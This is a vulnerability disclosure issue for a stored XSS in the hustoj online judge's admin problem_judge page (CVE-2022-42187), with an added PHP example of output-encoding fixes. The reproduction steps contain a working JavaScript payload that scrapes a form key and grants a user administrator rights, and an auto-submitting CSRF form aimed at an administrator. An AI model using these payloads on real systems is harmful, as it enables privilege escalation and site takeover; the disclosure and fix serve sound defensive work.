CVE-2022-42187: XSS Vulnerability in /admin/problem_judge.php · Issue #866 · zhblue/hustoj
Hustoj 22.09.22 has an XSS vulnerability in /admin/problem_judge.php.
Describe the problem
XSS Vulnerability exists in
echo $row['input_text']."\n";
How to reproduce
Steps to reproduce the behavior:
- POST text with xss script to submit.php
for example:
id=-1000&language=1&source=asdasdasdasdasd&input_text=<script src="/template/bs3/jquery.min.js"></script><script>$.get("/admin/privilege_add.php").done(function(data){ re=/name="postkey" value="([\w]%2B?)"/g; $.post("/admin/privilege_add.php",{"postkey":re.exec(data)[1],"user_id":"username","rightstr":"administrator","valuestr":"true" ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)}) }) </script>
Then you can get a sid.
- Send malicious links to administrators
example:
<body> <script type="text/javascript"> function post(URL, PARAMS) { var temp = document.createElement("form"); temp.action = URL; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement("textarea"); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); return temp; } post("http://192.168.0.25:8080/admin/problem_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})
</script> </body>
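
The echo pattern quoted in the issue, beside two hardened forms, as an added example that is not part of the issue or of hustoj's own code. The function names and the sample row are hypothetical, and the second option assumes the caller of this endpoint needs the stored bytes unchanged.

```php
<?php
// Added example, not hustoj code. $row stands in for a database row whose
// input_text column holds text submitted by a user (constructed sample).

// Before: the pattern quoted in the issue. The stored value is written into
// the response unchanged, so any markup in it is parsed by the browser of
// whoever loads the page (here, an administrator).
function emit_raw(array $row): string
{
    return $row['input_text'] . "\n";
}

// After, option 1: HTML-encode at the point of output. Use this when the
// response is rendered as HTML.
function emit_html_encoded(array $row): string
{
    return htmlspecialchars(
        $row['input_text'],
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    ) . "\n";
}

// After, option 2 (assumption: the consumer needs the bytes unchanged, so
// entity-encoding would corrupt the data). Declare the body as plain text
// and forbid MIME sniffing so a browser never parses it as HTML.
function send_as_plain_text(array $row): void
{
    if (!headers_sent()) {
        header('Content-Type: text/plain; charset=UTF-8');
        header('X-Content-Type-Options: nosniff');
    }
    echo $row['input_text'], "\n";
}

// Constructed sample row with a harmless marker payload.
$row = ['input_text' => '<script>alert(1)</script>'];

// Does the emitted text still contain a live <script> tag?
var_dump(strpos(emit_raw($row), '<script>') !== false);
var_dump(strpos(emit_html_encoded($row), '<script>') !== false);
echo emit_html_encoded($row);
```

Encoding at output fixes the injection point only; the auto-submitting form in the second reproduction step is a cross-site request, so the endpoint should also require the same per-session token check on POST that the admin pages use.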